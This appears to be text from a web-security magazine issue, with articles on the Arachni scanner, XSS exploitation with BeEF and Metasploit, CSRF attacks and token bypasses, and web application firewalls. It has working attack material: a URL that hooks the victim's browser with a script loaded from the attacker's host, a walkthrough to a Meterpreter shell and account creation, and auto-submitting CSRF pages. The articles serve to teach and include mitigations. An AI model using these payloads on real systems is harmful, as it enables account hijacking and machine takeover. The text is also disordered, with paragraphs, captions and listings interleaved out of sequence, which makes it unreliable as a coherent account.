Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as shown in Listing 3.
The code does not need a lot of explanation: it checks whether or not a specific directory exists; if yes, it forwards the name to the Arachni Trainer (which will include the directory in further scans) and creates a report entry for it.
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:

• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links to additional information and a reference to the standardised Common Weakness Enumeration (CWE).
Arachni lacks support for the following:

• No AJAX and JSON support
• No JavaScript support

This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON-related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again, this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a 15-year career spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company, Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman by e-mail (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it is sufficient to just show a small alert popup; this demonstrates that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would operate in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you can use on your own web server if you want to try this:
HTML Page

<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search"></INPUT>
<INPUT TYPE="submit" name="Submit" value="Submit"></INPUT>
</FORM>
</BODY>
</HTML>
XSS, BeEF and Metasploit Exploitation

Figure 2: BeEF after configuration

Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code.

Figure 1: The user enters input in a search box
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
http://localhost/search1.php?search=<script src=
'http://192.168.56.101/beef/hook/beefmagic.js.php'>
</script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane and then click on Standard Modules – Alert Dialog. This will result in a little popup box appearing on the victim machine. Here's a screenshot which shows the same (Figure 4), and this is what the victim will see (Figure 5).
So, as you can see, because of BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server Side PHP Code

<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, his input is sent to the server, which reads the value of the parameter and prints it to the screen. If, instead of simple text, the attacker enters JavaScript into the box, that JavaScript will execute on the user's machine rather than being displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1).
BeEF – Hook the user's browser
Now, while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not where an attacker will stop. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been completely rewritten and has many more features. For now, though, extract BeEF from the tarball and copy it into your web server directory.
Figure 3. Connection with the BeEF controller
Figure 4. What the attacker will see
Figure 5. What the victim will see
Figure 6. Defacing the current web page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; they are all the result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the web page being rewritten in the victim's browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).
Detect all Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and get a shell
Edit BeEF's configuration files so that it can talk directly to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins on the user's browser
Figure 8. Starting Metasploit
Figure 9. The "jobs" command
Figure 10. Metasploit after clicking "Send Now"
Figure 11. Meterpreter window – screenshot 1
Figure 12. Meterpreter window – screenshot 2
Now, first ensure that the zombie is still connected. Then click on Standard Modules – Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figures 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools, like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install these on this machine. We can then use these to port-scan an entire internal network or search for vulnerabilities in services running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13. Meterpreter window – screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for this.
• Whitelist and blacklist filtering can also be used to completely disallow specific characters in user input fields.
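The encoding step in the second point can be sketched in JavaScript. This is a minimal, illustrative encoder in the spirit of the OWASP cheat sheet rules for an HTML text context; the function name is mine, and a vetted library should be preferred in real code:

```javascript
// Minimal HTML-entity encoder (illustrative sketch, not a library).
// It escapes the characters that let user input break out of an
// HTML text context: & < > " ' /
function encodeForHtml(input) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
    '/': '&#x2F;'
  };
  return String(input).replace(/[&<>"'\/]/g, ch => map[ch]);
}

// The reflected search parameter from the PHP example above,
// encoded before being echoed back to the browser:
const payload = '<script>alert(document.domain)</script>';
console.log(encodeForHtml(payload));
// The script tag is now inert text, not executable markup.
```

With this in place, the server echoes the encoded string instead of raw markup, so the alert() never runs in the user's browser.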
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in system, network and web application penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email – arvinddoraiswamy@gmail.com
LinkedIn – http://www.linkedin.com/pub/arvind-doraiswamy/39b21332
Other writings – http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: this is when an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com"
style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:
• Only accept POST: This stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
• Referrer checking: Some users prohibit referrers, so you cannot simply require referrer headers. Techniques to selectively create HTTP requests without referrers also exist.
• Requiring multi-step transactions: CSRF attacks can simply perform each step in order.
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to type the text from a CAPTCHA image every time he submits a form might make users stop visiting your website. This is why websites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of its authorized users.
Listing 1. HTML code used to bypass protection

<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame"
      method="POST">
<input type="text" name="message" value="I like www.evil.com" >
<input type="submit" >
</form>
<script>document.Form.submit()</script>
</div>
index.php (Victim website)
And the webpage which processes the request and stores the message only if the given token is correct:
post.php (Victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):
index.php (Evil website)
For security reasons, the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:

Permission denied to access property 'document'

var token = window.frames[0].document.forms['messageForm'].token.value;
A browser's settings are not hard to modify, so the best approach to web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against this CSRF attack is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:
<script type="text/javascript">
if(top != self) top.location.replace(location);
</script>
A FrameKiller consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, so that they can be compared after the form is submitted.
Subverting one-time tokens is usually attempted with brute-force attacks. Brute-forcing one-time tokens is useful only if the token-generation mechanism is widely used by web developers. For example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).
Listing 2. Wrong token
<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. Correct token

<?php
session_start();
if($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, $message."\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these:
top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1

<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>
This protects the web application even if the webpage is loaded with JavaScript disabled in the browser, since the page content then simply stays hidden.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvelgevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006, then began seriously learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethic, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks, such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his job to a higher level and is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF), http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms["messageForm"].elements["token"].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" >
<input type="hidden" name="token" value="" >
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
Web applications are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.
In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands, can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and working lives. In order to facilitate all of these processes, a broad range of applications is required that is provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibility to simplify and accelerate business processes and make them more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of – and more powerful – applications that provide the internet user with the required functions as fast and simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly, simply and variously as possible. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.
Above all, the common practice of adapting tried and tested technologies for developing web applications without subjecting them to prior security and qualification tests is dangerous. In the belief that the existing network firewall will provide the required protection should weaknesses become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security level was based solely on how the individual developers rated this aspect and how much they knew about it.
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place, or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing websites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of the systems that follow on from it, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services will protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who carry the big responsibility here towards all those who use their applications, one which they often do not fulfill.
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.
As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies, such as network firewalls or Intrusion Prevention Systems, are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements on service providers who conduct security checks of business-critical systems with penetration tests should then also be correspondingly higher.
While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field. They now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes it easier to use legitimately, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and anonymous action. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular,
Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of a new technology and the securing of that technology. Both exhibit a similar technology adoption lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of peak vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios through which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: attackers have started to combine these methods more often in order to achieve even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify – with high efficiency – as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
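The fingerprinting step described above often amounts to nothing more than reading the banner headers that a web application gives away. A hedged sketch in JavaScript (the header values and field choices are invented examples; real tools inspect many more signals):

```javascript
// Toy fingerprinter: pull the response-header fields that most
// commonly leak software and version information.
function fingerprint(headers) {
  // Normalize header names to lower case before looking them up.
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  return {
    server: h['server'] || 'unknown',        // web server + OS hints
    platform: h['x-powered-by'] || 'unknown' // language/framework hints
  };
}

// Hypothetical headers captured from one automated probe:
const result = fingerprint({
  'Server': 'Apache/2.2.3 (CentOS)',
  'X-Powered-By': 'PHP/5.1.6'
});
console.log(result); // server and platform banners extracted
```

Run against thousands of hosts, even this trivial extraction already tells an attacker which targets run the vulnerable software version worth attacking.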
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would also have to raise older web applications to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced so that the data can be checked. It is then not sufficient to just add new functions. The developers must start by precisely analyzing the program and then making deep inroads into its basic structures. This is not only tedious but also harbors the danger of introducing mistakes. Another example is programs that do not use more than the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to session fixation.
If existing web applications display weak spots – and the probability is relatively high – then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity on whether, and to what extent, the problems must be resolved, or whether further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. No software program has ever gone into productive operation free of errors or without weak spots; the shortcomings are frequently uncovered over time. And by this time, correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority. The more safely a web application is written, the less improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection
Systems (IDS), a WAF checks the communications at the application level. Normally the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. By analogy with air traffic: it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably minimizes the risk of attacks on any weak spots.
After introducing a WAF, it is still advisable to check the security functions, as conducted by penetration testers. This might reveal, for example, that the system can be misused via SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application. If a WAF is also deployed as a protective system, then it can be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis; this would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing web application security.
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes of several web applications. If they are run in redundant mode, they can also perform load balancing in order to distribute data traffic better and increase the performance of the web applications. With content caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, the WAF filters the data flow between the browser and the web application. If an entry pattern emerges that is defined as invalid, the WAF interrupts the data transfer or reacts in another way predefined in its configuration. If, for example, two parameters have been defined for a monitored entry form, then the WAF can block all requests that contain three or more parameters. The length and contents of parameters can be checked in the same way. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid characters and the permitted value range.
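The parameter rules just described can be reduced to a small request checker. This is an illustrative sketch only; the rule set below is invented and mirrors the two-parameter search form example from the text:

```javascript
// Hypothetical rule set for a monitored entry form: at most two
// parameters, each with a length limit and an allowed-character set.
const formRules = {
  maxParams: 2,
  params: {
    search: { maxLength: 64, allowed: /^[\w .-]*$/ },
    Submit: { maxLength: 16, allowed: /^[A-Za-z]*$/ }
  }
};

function checkRequest(params, rules) {
  const names = Object.keys(params);
  if (names.length > rules.maxParams) return false;   // too many parameters
  for (const name of names) {
    const rule = rules.params[name];
    if (!rule) return false;                          // unknown parameter
    const value = params[name];
    if (value.length > rule.maxLength) return false;  // oversized value
    if (!rule.allowed.test(value)) return false;      // forbidden characters
  }
  return true;
}

console.log(checkRequest({ search: 'pentest', Submit: 'Submit' }, formRules)); // true
console.log(checkRequest({ search: '<script>alert(1)</script>', Submit: 'Submit' }, formRules)); // false
```

A request carrying a third parameter, an unknown parameter name, or characters outside the allowed set would be blocked before it ever reaches the application.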
Of course, an integrated XML firewall should also be standard these days, because increasingly more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule for access rates, with finely adjustable guidelines, also eliminates the negative consequences of Denial of Service or Brute Force attacks. However, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar. A virus scanner integrated into the WAF checks every file before it is sent to the web application.
Figure 2. An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can – to a certain extent – automatically prevent malicious code from reaching the browser if, for example, a web application does not check the original data sufficiently. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. However, in practice a whitelist-only approach is quite cumbersome, requiring constant re-learning if there are any changes to the application. As a result, whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, however, offers attackers too many loopholes. Consequently, the ideal solution should rely on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
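The hybrid model described here can be pictured as a toy filter: a blacklist of known attack patterns applied everywhere, plus a strict whitelist profile for one high-value sub-section. All URLs, patterns and profiles below are invented for illustration; real WAF rule sets are far richer:

```javascript
// Blacklist: known-bad patterns rejected in any parameter value.
const blacklist = [/<script/i, /union\s+select/i, /\.\.\//];

// Whitelist: a learned profile for one high-value page, where every
// parameter must match its expected shape exactly.
const whitelist = {
  '/order/entry': { item: /^\d{1,6}$/, qty: /^\d{1,3}$/ }
};

function allowRequest(url, params) {
  // Negative security: reject known attack patterns everywhere.
  for (const value of Object.values(params)) {
    if (blacklist.some(rx => rx.test(value))) return false;
  }
  // Positive security: on profiled pages, enforce the whitelist.
  const profile = whitelist[url];
  if (profile) {
    for (const [name, value] of Object.entries(params)) {
      if (!profile[name] || !profile[name].test(value)) return false;
    }
  }
  return true;
}

console.log(allowRequest('/order/entry', { item: '1042', qty: '2' })); // true
console.log(allowRequest('/search', { q: "' UNION SELECT password" })); // false
```

The blacklist covers the whole application cheaply, while the whitelist only has to be maintained for the few pages where it is worth the tuning effort, which is exactly the trade-off the paragraph above describes.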
To prevent a high number of false positives, some manufacturers provide an exception profiler. Based on an extensive heuristic analysis, this flags to the administrator entries that violate the policies but can still be categorized as legitimate. At the same time, the exception profiler suggests exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks, even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as it sits in line and uses both of the system's physical ports (WAN and LAN). As a proxy, the WAF can protect web applications against attacks such as session spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode, and certain special functions are only available here. As a Full Reverse Proxy, a WAF provides, for example, Instant SSL, which converts HTTP pages to HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, that is, the rewriting of URLs used in public requests to the web application's hidden URLs. This means that the application's actual web address remains cloaked. With proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to avert Denial of Service attacks), as well as authentication and authorization. Cloaking, the concealment of one's own IT infrastructure, is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey. Masking outgoing data provides protection against data theft, and cookie security prevents identity theft. But proxy WAFs must also be configured to match the respective environment; penetration tests help with the correct configuration.

Figure 3: A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
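The URL translation a proxy WAF performs can be sketched as a simple prefix-rewriting table; the public and internal paths below are invented for illustration.

```python
# Hypothetical sketch of proxy-WAF URL translation: public request paths
# are rewritten to the application's hidden internal URLs, so the real
# structure stays cloaked. All paths here are invented.
REWRITE_RULES = [
    ("/shop/", "/legacy-app/v2/store/"),
    ("/account/", "/internal/usermgmt/"),
]

def rewrite_url(public_path):
    """Map a public path to the hidden backend path (first matching rule wins)."""
    for public_prefix, internal_prefix in REWRITE_RULES:
        if public_path.startswith(public_prefix):
            return internal_prefix + public_path[len(public_prefix):]
    return public_path  # no rule: pass through unchanged
```

The reverse mapping would be applied to outgoing responses (e.g. Location headers) so the internal structure never leaks to the client.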
Demands on Penetration Testers

When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for transmitting and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support it?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible exfiltration of sensitive data and then stops it.
